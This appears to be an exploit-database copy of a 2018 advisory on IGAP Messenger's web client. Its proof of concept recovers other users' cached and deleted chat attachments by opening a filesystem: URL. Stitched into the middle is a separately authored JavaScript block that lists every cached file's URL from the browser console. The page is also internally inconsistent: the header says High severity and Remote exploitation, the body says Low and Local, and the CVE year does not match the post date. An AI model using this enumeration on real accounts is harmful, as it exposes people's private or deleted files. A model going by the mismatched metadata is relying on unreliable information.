IGAP Messenger Web Version Insecure Direct Object References Vulnerability

CVE               : CVE-2021-3530
Category          : CWE-639
Price             : Not specified
Severity          : High
Author            : Unknown
Risk              : High
Exploitation Type : Remote
Date              : 2018-01-19
CPE               : cpe:/a:igap:messenger:web-version
CVSS              : CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
EPSS              : 0.02192
EPSS percentile   : 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010182

Below is a copy:

[+] Exploit Title : IGAP Messenger Web Version Insecure Direct Object References Vulnerability

[+] Date : 2018-01-19

[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS

[+] Vendor Homepage : https://web.igap.net/

[+] Version : 3.2.0

[+] Dork : N/A

[+] Forum : irethicalhackers.com/forums

[+] Tested On : Windows 10, Kali Linux 2.0

[+] Contact : https://telegram.me/WebServer

[+] Description :

[!] IGAP is a widely used instant messenger.

[!] IGAP is available in three versions: desktop, web and mobile.

[!] It has more than 100,000 users in Iran and can be downloaded from the App Store.

[+] Support Site :

[!] https://www.igap.net

[+] Poc : 

[!] The web client keeps chat attachments in the browser's origin-sandboxed FileSystem API storage, which Chromium exposes under the filesystem: URL scheme.

[!] Browsing that storage shows every file the client has cached: attachments uploaded to groups or to private chats.

[!] Files that have since been deleted from the conversation are still present there, so they can be recovered.

[!] Be aware that these are files shared by other people in the chats the account belongs to.

[+] Access To Vulnerability

[!] First, log in to your account.

[!] Then, in the same browser, open this link: filesystem:https://web.igap.net/temporary/

[!] Alternatively, right-click an attachment image in a chat, choose "Copy Image Address", and open the copied filesystem: URL to view the file directly.
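An added example, not code from the advisory or from IGAP, showing what the filesystem: link above actually addresses: the browser's origin-sandboxed FileSystem API storage, which Chromium exposes under filesystem:<origin>/temporary/. The walker lists every cached file with the same kind of filesystem: URL that "Copy Image Address" reveals, honours the batched readEntries() contract (a common mistake is to read only the first batch), and includes the client-side fix a reviewer would ask for: removing cached attachments. The origin is the one from the advisory; webkitRequestFileSystem is assumed to exist only in Chromium-based browsers; the fake Entry objects and the sample tree are constructed stand-ins so the walker can run outside a browser.

```javascript
// Added example (not from the advisory or IGAP): enumerate and purge the
// Chromium FileSystem API sandbox that filesystem:<origin>/temporary/ exposes.

const ORIGIN = 'filesystem:https://web.igap.net'; // origin taken from the advisory

// readEntries() returns entries in batches and must be called again until it
// yields an empty array; stopping after the first batch silently misses files.
function readAllEntries(dirEntry) {
  const reader = dirEntry.createReader();
  return new Promise((resolve, reject) => {
    const all = [];
    const next = () => reader.readEntries((batch) => {
      if (batch.length === 0) return resolve(all);
      all.push(...batch);
      next();
    }, reject);
    next();
  });
}

// Depth-first collection of every FileEntry below dirEntry.
async function collectFileEntries(dirEntry) {
  const files = [];
  for (const entry of await readAllEntries(dirEntry)) {
    if (entry.isDirectory) files.push(...(await collectFileEntries(entry)));
    else files.push(entry);
  }
  return files;
}

// Path inside the sandbox plus the filesystem: URL that opens it, sorted.
async function listCachedFiles(rootEntry) {
  const files = await collectFileEntries(rootEntry);
  return files
    .map((e) => ({ path: e.fullPath, url: e.toURL() }))
    .sort((a, b) => a.path.localeCompare(b.path));
}

// Client-side clean-up: delete each cached file (FileEntry.remove is callback
// based). A client that did this when an attachment is deleted from the chat
// would leave no recoverable copy behind. Returns the number removed.
async function purgeCachedFiles(rootEntry) {
  const files = await collectFileEntries(rootEntry);
  for (const e of files) {
    await new Promise((ok, fail) => e.remove(ok, fail));
  }
  return files.length;
}

// Browser entry point (Chromium only; assumes window.webkitRequestFileSystem).
// Run from the devtools console on https://web.igap.net after logging in.
function dumpTemporaryStorage() {
  return new Promise((resolve, reject) => {
    if (typeof webkitRequestFileSystem !== 'function') {
      return reject(new Error('FileSystem API not available in this browser'));
    }
    webkitRequestFileSystem(window.TEMPORARY, 0,
      (fs) => listCachedFiles(fs.root).then(resolve, reject), reject);
  });
}

// Constructed fakes of the Entry interfaces; readEntries hands out two entries
// per call to exercise the batching loop above.
function fakeFile(fullPath) {
  return { isDirectory: false, isFile: true, fullPath,
           toURL: () => ORIGIN + '/temporary' + fullPath,
           remove: (ok) => setTimeout(ok, 0) };
}
function fakeDir(fullPath, children) {
  return { isDirectory: true, isFile: false, fullPath,
           toURL: () => ORIGIN + '/temporary' + fullPath,
           createReader() {
             let i = 0;
             return { readEntries(ok) {
               const batch = children.slice(i, i + 2);
               i += batch.length;
               setTimeout(() => ok(batch), 0);
             } };
           } };
}

// Constructed sample tree standing in for a logged-in client's cache.
function sampleTree() {
  return fakeDir('/', [
    fakeFile('/avatar.png'),
    fakeDir('/group', [fakeFile('/group/photo1.jpg'),
                       fakeFile('/group/photo2.jpg'),
                       fakeFile('/group/report.pdf')]),
    fakeFile('/voice.ogg'),
    fakeDir('/empty', []),
  ]);
}

// Outside a browser, walk the constructed tree so the output shape is visible.
if (typeof window === 'undefined') {
  listCachedFiles(sampleTree()).then((files) => files.forEach((f) => console.log(f.url)));
}
```

In a real browser, call dumpTemporaryStorage() from the console on the web.igap.net origin; each returned url is directly openable in the address bar, which is exactly why a client that caches attachments here must also remove them when they are deleted from the conversation.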


[+] Security Level :

[!] Low

[+] Exploitation Technique:

[!] Local



[+] Vulnerability Link :

[*] filesystem:https://web.igap.net/temporary/

[+] ScreenShot :

[!] http://s6.uplod.ir/i/00912/br0rj3z9ntwm.png


[+] We Are : Mehrdad_ice [+] 0P3N3R [+] BaxTurk24 [+] S0hp

Copyright ©2024 Exploitalert.